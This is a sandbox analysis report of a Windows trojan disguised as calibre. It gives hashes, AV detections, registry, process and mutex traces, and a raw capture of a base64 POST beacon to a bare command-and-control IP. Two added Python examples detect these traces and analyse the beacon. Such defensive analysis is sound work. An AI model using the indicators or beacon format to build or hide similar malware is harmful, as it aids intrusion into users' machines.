Analysis Date: 2015-08-28 08:16:51
MD5: c0ccd2f116bb3ecb854bae0c44906f88
SHA1: da63ba3e448338423942236c5ff009ea8d59589c

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 0deec3c39c74ba1da9f64aa99e9d760e sha1: 1f9a69b3c9bfeed94dcb7bddfa5aaf634a7686a9 size: 42496
Section .rdata: md5: 88e0acd75753b0a42463194f6a3d3c21 sha1: 8ce3003f685381d167e2dae3f2006e501e401413 size: 14848
Section .data: md5: 794547c6077455cd6828dbfaa7b2c968 sha1: e21e819a5129c30ec2792e03aec38964565d6025 size: 227840
Section .rsrc: md5: f027253ed254bbd2413d4fee3215d7fc sha1: f0fece9b5b36e1efc6bcdddb2779cee7ed55d6aa size: 54272
Section .reloc: md5: 2ab1ebef9d0ac3f604ec43a917d541f3 sha1: acf1b8b5775c9e8b2f1612dbb261d46e675903f1 size: 5120
Timestamp (PE header): 2015-06-16 13:03:54
Pdb path: K:\types\fileheader\cursor\packet.pdb
Version info:
  LegalCopyright: GNU GPL v3.0
  InternalName: calibre
  FileVersion: 2.13.0.0
  CompanyName: calibre-ebook.com
  LegalTrademarks: calibre is a registered U.S. trademark number 3,666,525
  ProductName: calibre
  ProductVersion: 2.13.0
  FileDescription: The main calibre program
  OriginalFilename: calibre.exe
  Note: the version resource presents the file as calibre 2.13.0 (calibre.exe), which is contradicted by the PDB path above, the AV results and the runtime behaviour below; treat it as spoofed metadata, not as evidence of origin.
Packer: Microsoft Visual C++ ?.?
PEhash: 3fb185f693fb3f5277b09c74c2684e2e27ef959b
IMPhash: ee3a4f578e84bd60505fdb57772d8d74
AV Rising: 0x58f73039
AV Mcafee: GenericR-DUT!C0CCD2F116BB
AV Avira (antivir): TR/Crypt.ZPACK.21629
AV Twister: Trojan.Girtk.DMOW.nujs
AV Ad-Aware: Trojan.GenericKD.2496955
AV Alwil (avast): Malware-gen:Win32:Malware-gen
AV Eset (nod32): Win32/Kryptik.DMOW
AV Grisoft (avg): Crypt4.AVNX
AV Symantec: no_virus
AV Fortinet: W32/Kryptik.DMOW!tr
AV BitDefender: Trojan.GenericKD.2496955
AV K7: Trojan ( 004c60741 )
AV Microsoft Security Essentials: Trojan:Win32/Kovter!rfn
AV MicroWorld (escan): Trojan.GenericKD.2496955
AV MalwareBytes: Trojan.CryptoLocker
AV Authentium: W32/Trojan.ZDSI-8945
AV Frisk (f-prot): no_virus
AV Ikarus: Trojan.Win32.Crypt
AV Emsisoft: Trojan.GenericKD.2496955
AV Zillya!: Downloader.Dofoil.Win32.2171
AV Kaspersky: no_virus
AV Trend Micro: no_virus
AV CAT (quickheal): Trojan.Generic.B4
AV VirusBlokAda (vba32): TrojanDownloader.Dofoil
AV Padvish: no_virus
AV BullGuard: Trojan.GenericKD.2496955
AV Arcabit (arcavir): Trojan.GenericKD.2496955
AV ClamAV: no_virus
AV Dr. Web: Trojan.DownLoader13.47485
AV F-Secure: Trojan.GenericKD.2496955
AV CA (E-Trust Ino): no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates Process: svchost.exe

Process
↳ svchost.exe

Creates Process: svchost.exe

Process
↳ svchost.exe

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\80744bde\964706c2 ➝ Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\x00
Registry: HKEY_LOCAL_MACHINE\software\80744bde\efea1db6 ➝ A683C7D6F442994D46BEAC684C067395\x00
Registry: HKEY_CURRENT_USER\SOFTWARE\80744bde\964706c2 ➝ Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\x00
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\svchost.exe ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Registry: HKEY_CURRENT_USER\software\80744bde\efea1db6 ➝ A683C7D6F442994D46BEAC684C067395\x00
Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1206 ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1206 ➝ NULL
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\svchost.exe ➝ NULL
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\uvipe\uvipe.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\168.55.208[1].htm
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\microsoft[1].htm
Creates File: \Device\Afd\Endpoint
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\microsoft[1].htm
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\168.55.208[1].htm
Deletes File: c:\malware.exe
Creates Process: "C:\WINDOWS\system32\svchost.exe"
Creates Process: "C:\WINDOWS\system32\svchost.exe"
Creates Process: "C:\WINDOWS\system32\svchost.exe"
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: 47D12054
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: Global\80744bde
Winsock DNS: microsoft.com
Winsock DNS: 168.55.208.197

Process
↳ "C:\WINDOWS\system32\svchost.exe"

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\80744bde\964706c2 ➝ Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\x00
Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\SOFTWARE\80744bde\964706c2 ➝ Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\x00
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\77A66B94CB08E688 ➝ 77A66B94CB08E688\x00
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\NetFx20SP1_x86.exe
Creates File: PIPE\wkssvc
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: "C:\Documents and Settings\Administrator\Local Settings\Temp\NetFx20SP1_x86.exe" /quiet /norestart
Winsock DNS: download.microsoft.com

Process
↳ "C:\WINDOWS\system32\svchost.exe"

Creates Mutex: 11C1A349

Process
↳ "C:\WINDOWS\system32\svchost.exe"

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\NetFx20SP1_x86.exe" /quiet /norestart

Creates File: C:\WINDOWS\SYSTEM32\REDIR.EXE
Creates File: C:\WINDOWS\SYSTEM32\COMMAND.COM
Creates File: C:\WINDOWS\TEMP\scs2.tmp
Creates File: C:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates File: C:\WINDOWS\SYSTEM32\DOSX.EXE
Creates File: C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates File: C:\WINDOWS\TEMP\scs1.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\TEMP\NETFX2~1.EXE
Deletes File: C:\WINDOWS\TEMP\scs1.tmp
Deletes File: C:\WINDOWS\TEMP\scs2.tmp
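
The registry, mutex and process entries above share a structure worth hunting for across a fleet: a key named with a bare 8-hex-digit string (80744bde) directly under HKLM\SOFTWARE and HKCU\SOFTWARE where a vendor name would normally sit, a mutex Global\80744bde reusing that string, a FEATURE_BROWSER_EMULATION entry for svchost.exe (that key is normally populated by applications that embed the IE rendering control, so an entry for a service host is consistent with injected code), and svchost.exe started by C:\malware.exe instead of services.exe. The code below is an added example written for this page, not sandbox output or code from the sample: it runs those four checks over a constructed event list modelled on the report. The kind/path/data/name/image/parent schema, the SYSTEM_HOSTS list and the benign contrast events are the example's own assumptions.

```python
import re

# Constructed events modelled on the Runtime Details above. The parent of
# C:\malware.exe and the benign svchost.exe / Run-key entries are made up for
# contrast; the field names are this example's own schema, not a real log format.
EVENTS = [
    {"kind": "process", "image": r"C:\malware.exe", "parent": r"C:\WINDOWS\explorer.exe"},
    {"kind": "process", "image": r"C:\WINDOWS\system32\svchost.exe", "parent": r"C:\malware.exe"},
    {"kind": "process", "image": r"C:\WINDOWS\system32\svchost.exe",
     "parent": r"C:\WINDOWS\system32\services.exe"},
    {"kind": "registry", "path": r"HKEY_LOCAL_MACHINE\SOFTWARE\80744bde\964706c2",
     "data": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"},
    {"kind": "registry", "path": r"HKEY_CURRENT_USER\software\80744bde\efea1db6",
     "data": "A683C7D6F442994D46BEAC684C067395"},
    {"kind": "registry", "path": r"HKEY_LOCAL_MACHINE\SOFTWARE\77A66B94CB08E688",
     "data": "77A66B94CB08E688"},
    {"kind": "registry", "data": None, "path": r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\svchost.exe"},
    {"kind": "registry", "path": r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "data": "benign"},
    {"kind": "mutex", "name": r"Global\80744bde"},
    {"kind": "mutex", "name": r"c:!documents and settings!administrator!cookies!"},
]

# A key name that is nothing but 8 or 16 hex digits, where a vendor name is expected.
BARE_HEX = re.compile(r"^(?:[0-9a-f]{8}|[0-9a-f]{16})$", re.IGNORECASE)

# Service hosts that are not expected to embed the IE rendering control, so a
# FEATURE_BROWSER_EMULATION entry for them points at injected code (example's own list).
SYSTEM_HOSTS = {"svchost.exe", "lsass.exe", "services.exe", "winlogon.exe", "csrss.exe"}


def hex_key_under_software(path):
    """Return the bare-hex key directly under <hive>\\SOFTWARE, lower-cased, or None."""
    parts = path.split("\\")
    if len(parts) >= 3 and parts[1].lower() == "software" and BARE_HEX.match(parts[2]):
        return parts[2].lower()
    return None


def hunt(events):
    """Return (rule, evidence) findings. The mutex rule is a correlation: it fires
    only when the mutex name repeats a bare-hex key seen among the registry events."""
    findings, hex_keys = [], set()
    for e in events:
        if e["kind"] == "registry":
            key = hex_key_under_software(e["path"])
            if key:
                hex_keys.add(key)
                findings.append(("bare-hex key under SOFTWARE", e["path"]))
            parts = e["path"].split("\\")
            if (len(parts) >= 2 and parts[-2].upper() == "FEATURE_BROWSER_EMULATION"
                    and parts[-1].lower() in SYSTEM_HOSTS):
                findings.append(("browser-emulation entry for a system host", e["path"]))
        elif e["kind"] == "process":
            image, parent = e["image"].lower(), e["parent"].lower()
            # On XP-era Windows svchost.exe is started by services.exe; anything else is odd.
            if image.endswith("\\svchost.exe") and not parent.endswith("\\services.exe"):
                findings.append(("svchost.exe not started by services.exe", f"{parent} -> {image}"))
    for e in events:
        if e["kind"] == "mutex" and e["name"].split("\\")[-1].lower() in hex_keys:
            findings.append(("mutex name reuses a bare-hex registry key", e["name"]))
    return findings


FINDINGS = hunt(EVENTS)
```

On the constructed list this yields six findings: three bare-hex keys (both 80744bde keys and 77A66B94CB08E688), the FEATURE_BROWSER_EMULATION entry for svchost.exe, the svchost.exe spawned by malware.exe, and Global\80744bde correlated back to the registry key. Feed it real Sysmon or EDR events mapped to the same fields and the same logic applies.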

Network Details:

DNS: microsoft.com (Type: A) ➝ 134.170.185.46
DNS: microsoft.com (Type: A) ➝ 134.170.188.221
DNS: a767.dscms.akamai.net (Type: A) ➝ 23.3.98.41
DNS: a767.dscms.akamai.net (Type: A) ➝ 23.3.98.11
DNS: westocean.net (Type: A)
DNS: download.microsoft.com (Type: A)
HTTP GET: http://microsoft.com/
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://download.microsoft.com/download/0/8/c/08c19fa4-4c4f-4ffb-9d6c-150906578c9e/NetFx20SP1_x86.exe
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://168.55.208.197/
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1031 ➝ 134.170.185.46:80
Flows TCP: 192.168.1.1:1032 ➝ 23.3.98.41:80
Flows TCP: 192.168.1.1:1036 ➝ 188.71.33.155:8080
Flows TCP: 192.168.1.1:1033 ➝ 73.225.129.209:8080
Flows TCP: 192.168.1.1:1034 ➝ 168.55.208.197:80
Flows TCP: 192.168.1.1:1035 ➝ 152.214.58.170:80
Flows TCP: 192.168.1.1:1037 ➝ 165.127.193.148:80
Flows TCP: 192.168.1.1:1038 ➝ 25.21.223.35:80
Flows TCP: 192.168.1.1:1039 ➝ 168.55.208.197:80
Flows TCP: 192.168.1.1:1040 ➝ 133.214.42.205:80
Flows TCP: 192.168.1.1:1041 ➝ 172.29.162.119:80
Flows TCP: 192.168.1.1:1042 ➝ 82.138.123.58:80
Flows TCP: 192.168.1.1:1044 ➝ 206.226.10.85:80
Note: the GET to download.microsoft.com fetches the .NET Framework 2.0 SP1 installer (NetFx20SP1_x86.exe), which the sample then runs with /quiet /norestart, and the GET to microsoft.com resolves to the Microsoft/Akamai addresses above; neither is the sample's own infrastructure. The POST to 168.55.208.197 and the remaining flows on ports 80 and 8080 have no matching DNS lookups in the capture and are direct-to-IP connections made by the sample.

Raw Pcap
0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000020 (00032)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000030 (00048)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x00000040 (00064)   696e646f 7773204e 5420352e 313b2053   indows NT 5.1; S
0x00000050 (00080)   56313b20 2e4e4554 20434c52 20322e30   V1; .NET CLR 2.0
0x00000060 (00096)   2e353037 3237290d 0a486f73 743a206d   .50727)..Host: m
0x00000070 (00112)   6963726f 736f6674 2e636f6d 0d0a4361   icrosoft.com..Ca
0x00000080 (00128)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x00000090 (00144)   63616368 650d0a0d 0a                  cache....

0x00000000 (00000)   47455420 2f646f77 6e6c6f61 642f302f   GET /download/0/
0x00000010 (00016)   382f632f 30386331 39666134 2d346334   8/c/08c19fa4-4c4
0x00000020 (00032)   662d3466 66622d39 6436632d 31353039   f-4ffb-9d6c-1509
0x00000030 (00048)   30363537 38633965 2f4e6574 46783230   06578c9e/NetFx20
0x00000040 (00064)   5350315f 7838362e 65786520 48545450   SP1_x86.exe HTTP
0x00000050 (00080)   2f312e31 0d0a5573 65722d41 67656e74   /1.1..User-Agent
0x00000060 (00096)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000070 (00112)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000080 (00128)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000090 (00144)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x000000a0 (00160)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000b0 (00176)   6f73743a 20646f77 6e6c6f61 642e6d69   ost: download.mi
0x000000c0 (00192)   63726f73 6f66742e 636f6d0d 0a436163   crosoft.com..Cac
0x000000d0 (00208)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000e0 (00224)   61636865 0d0a0d0a                     ache....

0x00000000 (00000)   42                                    B

0x00000000 (00000)   77                                    w

0x00000000 (00000)   504f5354 202f2048 5454502f 312e310d   POST / HTTP/1.1.
0x00000010 (00016)   0a436f6e 74656e74 2d547970 653a2061   .Content-Type: a
0x00000020 (00032)   70706c69 63617469 6f6e2f78 2d777777   pplication/x-www
0x00000030 (00048)   2d666f72 6d2d7572 6c656e63 6f646564   -form-urlencoded
0x00000040 (00064)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000050 (00080)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000060 (00096)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x00000070 (00112)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000080 (00128)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000090 (00144)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x000000a0 (00160)   20313638 2e35352e 3230382e 3139370d    168.55.208.197.
0x000000b0 (00176)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x000000c0 (00192)   20333830 0d0a4361 6368652d 436f6e74    380..Cache-Cont
0x000000d0 (00208)   726f6c3a 206e6f2d 63616368 650d0a0d   rol: no-cache...
0x000000e0 (00224)   0a645446 46325a59 38574558 7975735a   .dTFF2ZY8WEXyusZ
0x000000f0 (00240)   394d324b 55566734 38336243 4873366c   9M2KUVg483bCHs6l
0x00000100 (00256)   67774c79 4f596b53 76467338 5358684d   gwLyOYkSvFs8SXhM
0x00000110 (00272)   49595854 335a2b5a 624a3853 556e6c31   IYXT3Z+ZbJ8SUnl1
0x00000120 (00288)   58397052 6a2b5a74 664e5069 44743575   X9pRj+ZtfNPiDt5u
0x00000130 (00304)   38303671 64514276 687a526e 724b4c42   806qdQBvhzRnrKLB
0x00000140 (00320)   46523736 5a574b47 716c4345 686a6b4b   FR76ZWKGqlCEhjkK
0x00000150 (00336)   78786769 6c69472b 657a7161 4b386272   xxgiliG+ezqaK8br
0x00000160 (00352)   75725242 57357243 397a4175 70443846   urRBW5rC9zAupD8F
0x00000170 (00368)   6e36526e 6e413645 7333514d 6b556d6a   n6RnnA6Es3QMkUmj
0x00000180 (00384)   5a6e3775 696c4836 3750686f 79516955   Zn7uilH67PhoyQiU
0x00000190 (00400)   59383541 36714c47 58664548 5673462b   Y85A6qLGXfEHVsF+
0x000001a0 (00416)   6b4a5a73 6e34504e 55444833 47556738   kJZsn4PNUDH3GUg8
0x000001b0 (00432)   38364d55 494d714b 2b6c4259 48787766   86MUIMqK+lBYHxwf
0x000001c0 (00448)   63556876 516e306f 56574e5a 576b4835   cUhvQn0oVWNZWkH5
0x000001d0 (00464)   384f5653 59794b41 50554233 31307a63   8OVSYyKAPUB310zc
0x000001e0 (00480)   4a693668 616b424c 79653273 502f6962   Ji6hakBLye2sP/ib
0x000001f0 (00496)   394f7877 67795845 73346d43 72574d42   9OxwgyXEs4mCrWMB
0x00000200 (00512)   33746748 44494841 792f6842 5a373057   3tgHDIHAy/hBZ70W
0x00000210 (00528)   7766482b 70653764 494f6d6a 52315545   wfH+pe7dIOmjR1UE
0x00000220 (00544)   4c72786f 37476769 4a427579 4f6f2f54   Lrxo7GgiJBuyOo/T
0x00000230 (00560)   4c764864 56477373 79774476 584d5a4f   LvHdVGssywDvXMZO
0x00000240 (00576)   736d5538 4b326e72 4b78744a 715a6b54   smU8K2nrKxtJqZkT
0x00000250 (00592)   4b79666f 30706246 426b2b34 3d         Kyfo0pbFBk+4=

0x00000000 (00000)   37                                    7

0x00000000 (00000)   79                                    y

0x00000000 (00000)   46                                    F

0x00000000 (00000)   34                                    4

0x00000000 (00000)   70                                    p

0x00000000 (00000)   4d                                    M

0x00000000 (00000)   aa                                    .

0x00000000 (00000)   a1                                    .
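
The POST body in the dump above can be checked mechanically. The following Python is an added example written for this page, not part of the sandbox output: it parses the sandbox's hexdump format back into bytes (verifying the offset column as it goes), splits the HTTP request, and reports whether the declared Content-Length matches the body and whether a body declared as application/x-www-form-urlencoded is actually a form or a single base64 blob. The dump embedded in it is copied from the Raw Pcap section; the function and result-field names are the example's own.

```python
import base64
import binascii
import re

# The POST to 168.55.208.197, copied verbatim from the Raw Pcap section above
# (sandbox format: hex offset, (decimal offset), up to four 4-byte hex groups, ASCII).
POST_DUMP = """\
0x00000000 (00000)   504f5354 202f2048 5454502f 312e310d   POST / HTTP/1.1.
0x00000010 (00016)   0a436f6e 74656e74 2d547970 653a2061   .Content-Type: a
0x00000020 (00032)   70706c69 63617469 6f6e2f78 2d777777   pplication/x-www
0x00000030 (00048)   2d666f72 6d2d7572 6c656e63 6f646564   -form-urlencoded
0x00000040 (00064)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000050 (00080)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000060 (00096)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x00000070 (00112)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000080 (00128)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000090 (00144)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x000000a0 (00160)   20313638 2e35352e 3230382e 3139370d    168.55.208.197.
0x000000b0 (00176)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x000000c0 (00192)   20333830 0d0a4361 6368652d 436f6e74    380..Cache-Cont
0x000000d0 (00208)   726f6c3a 206e6f2d 63616368 650d0a0d   rol: no-cache...
0x000000e0 (00224)   0a645446 46325a59 38574558 7975735a   .dTFF2ZY8WEXyusZ
0x000000f0 (00240)   394d324b 55566734 38336243 4873366c   9M2KUVg483bCHs6l
0x00000100 (00256)   67774c79 4f596b53 76467338 5358684d   gwLyOYkSvFs8SXhM
0x00000110 (00272)   49595854 335a2b5a 624a3853 556e6c31   IYXT3Z+ZbJ8SUnl1
0x00000120 (00288)   58397052 6a2b5a74 664e5069 44743575   X9pRj+ZtfNPiDt5u
0x00000130 (00304)   38303671 64514276 687a526e 724b4c42   806qdQBvhzRnrKLB
0x00000140 (00320)   46523736 5a574b47 716c4345 686a6b4b   FR76ZWKGqlCEhjkK
0x00000150 (00336)   78786769 6c69472b 657a7161 4b386272   xxgiliG+ezqaK8br
0x00000160 (00352)   75725242 57357243 397a4175 70443846   urRBW5rC9zAupD8F
0x00000170 (00368)   6e36526e 6e413645 7333514d 6b556d6a   n6RnnA6Es3QMkUmj
0x00000180 (00384)   5a6e3775 696c4836 3750686f 79516955   Zn7uilH67PhoyQiU
0x00000190 (00400)   59383541 36714c47 58664548 5673462b   Y85A6qLGXfEHVsF+
0x000001a0 (00416)   6b4a5a73 6e34504e 55444833 47556738   kJZsn4PNUDH3GUg8
0x000001b0 (00432)   38364d55 494d714b 2b6c4259 48787766   86MUIMqK+lBYHxwf
0x000001c0 (00448)   63556876 516e306f 56574e5a 576b4835   cUhvQn0oVWNZWkH5
0x000001d0 (00464)   384f5653 59794b41 50554233 31307a63   8OVSYyKAPUB310zc
0x000001e0 (00480)   4a693668 616b424c 79653273 502f6962   Ji6hakBLye2sP/ib
0x000001f0 (00496)   394f7877 67795845 73346d43 72574d42   9OxwgyXEs4mCrWMB
0x00000200 (00512)   33746748 44494841 792f6842 5a373057   3tgHDIHAy/hBZ70W
0x00000210 (00528)   7766482b 70653764 494f6d6a 52315545   wfH+pe7dIOmjR1UE
0x00000220 (00544)   4c72786f 37476769 4a427579 4f6f2f54   Lrxo7GgiJBuyOo/T
0x00000230 (00560)   4c764864 56477373 79774476 584d5a4f   LvHdVGssywDvXMZO
0x00000240 (00576)   736d5538 4b326e72 4b78744a 715a6b54   smU8K2nrKxtJqZkT
0x00000250 (00592)   4b79666f 30706246 426b2b34 3d         Kyfo0pbFBk+4=
"""

# Offset, then single-space-separated hex groups; the ASCII column is set off by
# several spaces, so the group pattern stops before it.
DUMP_LINE = re.compile(r"^0x([0-9a-fA-F]{8}) \(\d+\)\s+([0-9a-fA-F]{2,8}(?: [0-9a-fA-F]{2,8})*)")


def hexdump_to_bytes(dump):
    """Reassemble raw bytes, using the offset column to catch dropped or reordered lines."""
    out = bytearray()
    for line in dump.splitlines():
        m = DUMP_LINE.match(line)
        if not m:
            continue
        if int(m.group(1), 16) != len(out):
            raise ValueError(f"gap in dump: line at offset {m.group(1)} but {len(out)} bytes so far")
        for group in m.group(2).split(" "):
            out += bytes.fromhex(group)
    return bytes(out)


def parse_http_request(raw):
    """Split an HTTP/1.x request into (method, target, lower-cased headers, body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("end of headers not found")
    request_line, *header_lines = head.decode("latin-1").split("\r\n")
    method, target, _version = request_line.split(" ")
    headers = {}
    for h in header_lines:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def looks_like_form(body):
    """A real x-www-form-urlencoded body has key=value pairs, i.e. an '=' that is not padding."""
    return b"=" in body.rstrip(b"=")


def analyse_beacon(dump):
    """Structural facts about the request: declared vs actual length, and whether
    the 'form' body is really a form or one opaque base64 blob."""
    method, target, headers, body = parse_http_request(hexdump_to_bytes(dump))
    try:
        decoded = base64.b64decode(body, validate=True)
    except binascii.Error:
        decoded = None
    return {
        "method": method,
        "target": target,
        "host": headers.get("host"),
        "content_type": headers.get("content-type"),
        "content_length_matches": headers.get("content-length") == str(len(body)),
        "body_length": len(body),
        "looks_like_form": looks_like_form(body),
        "body_is_base64": decoded is not None,
        "decoded_length": None if decoded is None else len(decoded),
    }


REPORT = analyse_beacon(POST_DUMP)
```

On this capture the headers are self-consistent (Content-Length 380 matches the 380-byte body), but the body contains no key=value pairs: it is one base64 string that decodes to 284 bytes, so the form content type is cosmetic. That blob, the Host header carrying a bare IP, and the MSIE 6.0 User-Agent (the same string the sample stores in the registry) are the parts of this traffic worth a network signature; the GETs to microsoft.com and download.microsoft.com are not.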


Strings